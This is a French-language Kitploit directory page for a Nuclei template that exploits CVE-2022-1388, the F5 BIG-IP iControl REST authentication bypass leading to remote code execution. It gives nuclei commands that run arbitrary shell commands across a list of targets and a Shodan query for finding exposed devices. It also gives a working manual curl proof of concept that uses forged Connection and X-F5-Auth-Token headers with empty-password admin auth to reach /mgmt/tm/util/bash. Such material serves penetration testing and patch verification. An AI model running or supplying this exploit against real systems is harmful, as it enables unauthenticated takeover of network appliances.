Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 est une vulnérabilité de contournement d'authentification dans le composant REST de l'API iControl de BIG-IP qui a reçu un score CVSSv3 de 9.8. L'API REST iControl est utilisée pour la gestion et la configuration des appareils BIG-IP. CVE-2022-1388 pourrait être exploitée par un attaquant non authentifié ayant un accès réseau au port de gestion ou aux adresses IP self des appareils utilisant BIG-IP. L'exploitation permettrait à l'attaquant d'exécuter des commandes système arbitraires, de créer et de supprimer des fichiers et de désactiver des services. | Kitploit
Outils/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

Voir le dépôt
62il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2022-1388 est une vulnérabilité de contournement d'authentification dans le composant REST de l'API iControl de BIG-IP qui a reçu un score CVSSv3 de 9.8. L'API REST iControl est utilisée pour la gestion et la configuration des appareils BIG-IP. CVE-2022-1388 pourrait être exploitée par un attaquant non authentifié ayant un accès réseau au port de gestion ou aux adresses IP self des appareils utilisant BIG-IP. L'exploitation permettrait à l'attaquant d'exécuter des commandes système arbitraires, de créer et de supprimer des fichiers et de désactiver des services.

Partager

Modèle Nuclei d'exploit F5 BIG-IP iControl REST Auth Bypass RCE | Paramètre de commande

CVE-2022-1388 est une vulnérabilité de contournement d'authentification dans le composant REST de l'API iControl de BIG-IP à laquelle un score CVSSv3 de 9,8 a été attribué. L'API REST iControl est utilisée pour la gestion et la configuration des appareils BIG-IP. CVE-2022-1388 pourrait être exploitée par un attaquant non authentifié ayant un accès réseau au port de gestion ou aux adresses self IP des appareils BIG-IP. Son exploitation permettrait à l'attaquant d'exécuter des commandes système arbitraires, de créer et de supprimer des fichiers et de désactiver des services.

Ce modèle utilise token-spray / la variable CLI de nuclei

Ce modèle nuclei accepte le paramètre shell pour l'exploitation. Nous voulions tester des jetons obtenus via un autre workflow ou une recherche manuelle, nous avons donc utilisé la fonctionnalité de variable CLI de nuclei pour fournir dynamiquement une valeur de jeton unique ou une liste de jetons à ces modèles au moment de l'exécution.

-V, -var value custom vars in var=value format

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Capture d'écran de 2022-05-10 01-28-12

POC Manuel

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Détails supplémentaires

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

Références

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml
Télécharger l’outil